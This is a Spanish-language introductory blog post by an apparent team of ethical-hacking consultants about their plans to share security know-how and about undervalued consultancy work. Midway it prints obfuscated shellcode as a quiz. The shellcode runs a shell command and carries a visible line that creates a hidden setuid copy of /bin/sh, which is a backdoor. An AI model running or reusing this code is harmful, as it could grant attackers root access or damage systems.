Me pidieron iniciar este blog con un buen "floro" y aunque no tenía mucho de que escribir en este momento, un par de correos me motivaron.
El espíritu de este blog será compartir conocimiento, algo que hacemos a menudo, pero, no siempre de esta forma pública y grupal (tengo un blog personal que no recibe mis descargas pasionarias e intelectuales desde diciembre del 2008).
Somos un grupo de consultores (ya algún lector dira : ah! pense que eran hackers! son simples consultores!) que tienen mucho por compartir gracias a la experiencia ganada por las exigencias de los proyectos que hemos ejecutado y por el interés con que despertamos todos los días por aprender MAS (si es que dormimos...).
En este blog esperamos compartir lo que hemos aprendido utilizando herramientas hechas por otros, como hemos modificado algunas de estas herramientas, herramientas y scripts hechos por nosotros (más que nada scripts) y como se desenvuelve nuestro mundo de ethical hacking.
Uno de los correos que recibí hoy indicaba que una persona desestimaba nuestros servicios por el 99.9% de las herramientas que utilizamos son Software Libre, que es más barato contratar una empresa o persona que corra esas herramientas. No quiero ni saber que piensa sobre aquellos que usan herramientas comerciales.
Este correo me llevo a analizar dos cosas :
1. Qué tanto sabe la gente técnica y aquellos "hackers" (si, los hackers de blog, los pirañas de cabina, genios de baúl, palomillas de MS Windows, gurues de acequia, consultores "con vasta experiencia", instructores copy-paste) sobre hacking en seguridad informática ? Conocen Nessus ? Claro! Pero, saben que hace cada simplón checkbox de Nessus ? Han usado Metagoofil ? Estan seguros que no hay PDFs y/o metadata en ese website revisado con Metagoofil ? Es mejor un escaner de puertos rapido ? Saben como manejar tiempos en un simple escaneo de puertos ?
Saben que hace esto ? :
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Creen que MetaSploit es EL framework para lanzar ataques ? (en realidad es lo mejor que hay para analizar exploits y payloads)
Hasta ahora nos habiamos limitado a compartir estos conocimientos en charlas, cursos, talleres y conversaciones. Este blog nos permitirá hacerlo de forma más extensiva.
Aca valga una aclaración : las herramientas que hemos modificado solamente son usadas en nuestro trabajo y no hemos hecho públicos los cambios debido a que no tenemos el tiempo para participar como se debe de los proyectos que las han creado y mantienen.
2. Cuán maltratada esta la labor de los consultores ? Esta parte es bien importante porque de nada sirve hacer un buen trabajo de ethical hacking, encontrar y explotar vulnerabilidades si los resultados de la evaluación no le sirven a la organización evaluada.
Esto es un tema que pasa desde el uso de metodologías hasta las técnicas de trabajo en equipo, pero, en un medio tan nuevo para nosotros latinos (salvo algunos paises), no es fácil hacer que las organizaciones entiendan que un consultor si puede tener conocimientos avanzados como un hacker (sin mayor definición complementaria) y que sus recomendaciones son eminentemente técnicas.
También entregaremos mucha información que permita reinvidicar a nuestros queridos Whitehats (bueno, si alguno lavo su sombrero y quedo blanco, también es Whitehat o no ?)
A bloggear!!!!
Este blog deberá servir además como una forma de comunicar temas técnicos, algunas veces simples traducciones de otras novedades porque hay mucha gente que no domina aún el idioma Inglés, Alemán o Francés (no necesiriamente representan los idiomas más usados, pero, son los que manejamos en Open-Sec). Siempre se indicarán los créditos, acá no se "robarán" posts ni se presentarán genialidades como propias si no lo son.
No hay comentarios:
Publicar un comentario